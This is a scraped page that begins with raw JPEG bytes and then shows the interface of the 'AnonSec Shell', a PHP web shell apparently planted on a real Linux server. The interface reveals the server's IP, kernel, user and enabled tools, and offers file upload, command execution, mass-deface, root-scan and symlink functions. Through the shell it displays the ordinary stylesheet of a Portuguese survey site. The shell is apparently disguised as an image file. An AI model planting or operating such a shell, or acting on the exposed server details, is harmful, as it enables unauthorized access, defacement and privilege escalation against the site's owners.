JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/pesquisas/dev/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/pesquisas/dev//estilo.css
@import url('https://fonts.googleapis.com/css?family=Rammetto+One');

body {
    font-family: 'Rammetto One', cursive;
!important;
}

.fonte-titulo {
    /*font-family: 'Rammetto One', cursive;*/
!important;
    text-align: center;
    font-size: 25px;
}

.fonte-resposta {
    /*font-family: 'Rammetto One', cursive;*/
!important;
    text-align: center;
    font-size: 30px;
    padding: 5px 10px;
}

.fonte-pergunta {
    font-family: 'Rammetto One', cursive;
    text-align: center;
    font-size: 30px;
    padding: 5px 10px;
}

.estrelas input[type=radio] {
    display: none;
    font-size: 40px;
}

.estrelas input[type=radio]:checked ~ label i.fa:before {
    color: #bfbfbf;
    font-size: 40px;
}

.estrelas label i.fa:before {
    content: '\f111';
    color: #FC0;
    font-size: 40px;
}

.square-card {
    margin-left: auto;
    margin-right: auto;
    border-radius: 6px;
    background: #fff;
    text-align: justify;
    position: relative;
    transition: box-shadow 0.3s ease, border 0.3s;
    box-shadow: 12px 15px 20px 0px rgba(46, 61, 73, 0.15);
    border-radius: 20px;
    margin-bottom: auto;
    margin-top: auto;
    width: 100%;
    height: 100%;
}

.square-card:hover {
    box-shadow: 2px 4px 8px 0px rgba(46, 61, 73, 0.2);
    border: none;
}

/* square-card */
.square-card a {
    width: 100%;
    height: 100%;
    display: block;
    color: #525c65;
    border-bottom: none;
    text-decoration: none;
    transition: color 0.3s ease;
    max-width: 348px;
}

.square-card:hover {
    color: #24292d;
}

/* 	card-header */
.card-header {
    width: 100%;
    height: 150px;
    background-image: url('img/logo.jpg');
    background-repeat: no-repeat;
    background-position: center center;
    border-top-left-radius: 6px;
    border-top-right-radius: 6px;
}

/* card-header_overlay */
.card-header_overlay {
    /* 	background-color: rgba(2,179,228,0.8); */
    border-top-left-radius: 6px;
    border-top-right-radius: 6px;
    height: 9.75em;
    width: 100%;
    z-index: 4000;
}

/* pill */
.pill {
    color: #fff;
    position: relative;
    top: 5px;
    left: 5px;
    /* 	background-color: #fff; */
    background-color: #aa8553;
    font-size: 0.8125rem;
    line-height: 1.5rem;
    height: 1.5rem;
    padding: 5px 5px;
    border-radius: 4px;
    letter-spacing: .03em;
    z-index: 5000;
    text-transform: uppercase;
    font-weight: 400;
    box-shadow: 4px 6px 8px 0px rgba(46, 61, 73, 0.2);
}

/* card-title */
.card-title {
    /* 	padding: 24px 32px; */
    position: relative;
    text-align: center;
}

/* card-title > h4 */
.card-title > h4 {
    padding: 1em;
    font-size: 1.25em;
    line-height: 1.5em;
    font-weight: 300;
    /*text-transform: capitalize;*/
    text-align: justify;
    margin: 0;
    color: #2b2b2b;
    letter-spacing: .03em;
}

/* cta */
.cta {
    padding-bottom: 10px;
    padding-right: 20px;
    text-align: right;
}

.cta-logo {
    padding-bottom: 10px;
    padding-right: 20px;
    margin-left: 15px;
    text-align: left;
    font-size: 20px;
}

.cta a {
    /* 	color: #aa8553; */
    color: #999;
    text-transform: capitalize;
    letter-spacing: 1px;
    display: inline;
    /* 	padding: 10px; */
    margin-left: 10px;
    font-size: 14px;
    text-transform: uppercase;
}

.cta a:hover {
    text-decoration: underline;
    color: #141414;
}

.login-page, .register-page {
    background: #ecf0f5;
    background-image: url(img/camara.jpg);
    background-size: cover;
    width: 100%;
    margin-top: 1%;
    /*position: absolute;*/
    overflow-x: hidden;
    overflow-y: hidden;

}

.login-page2, .register-page {
    background: #ecf0f5;
    background-image: url(img/eusebio.jpg);
    background-size: cover;
    width: 100%;
    margin-top: 5%;
    position: absolute;
    overflow-x: hidden;
    overflow-y: hidden;

}

.login-pergunta, .register-page {
    background: #ecf0f5;
    background-image: url(img/pesquisa_fundo.png);
    background-size: cover;
    width: 100%;
    margin-top: 5%;
    position: absolute;
    overflow-x: hidden;
    overflow-y: hidden;
}

.wrapper {
    width: 97%;
    height: 100%;
    margin: auto;
    text-align: center;
    padding: 1% 0px;
    background-color: rgba(255, 255, 255, 0.60);
    webkit-box-shadow: 10px 3px 66px -19px rgba(0, 0, 0, 0.75);
    -moz-box-shadow: 10px 3px 66px -19px rgba(0, 0, 0, 0.75);
    box-shadow: 10px 3px 66px -19px rgba(0, 0, 0, 0.75);
    border-radius: 20px;
    z-index: 99;
}

.btn3d {
    font:normal 25px "Courier New", Courier, monospace;
    font-style:normal;
    color:#ffffff;
    background:#3aa57c;
    border:3px outset #ffffff;
    text-shadow:0px -1px 3px #000000;
    box-shadow:2px 2px 5px #000000;
    -moz-box-shadow:2px 2px 5px #000000;
    -webkit-box-shadow:2px 2px 5px #000000;
    border-radius:25px 25px 25px 25px;
    -moz-border-radius:25px 25px 25px 25px;
    -webkit-border-radius:25px 25px 25px 25px;
    width:25%;
    /*padding:12px 15px;*/
    cursor:pointer;
    margin:0 auto;
}
.btn3d:active{
    cursor:pointer;
    position:relative;
    top:2px;

}

Anon7 - 2022
AnonSec Team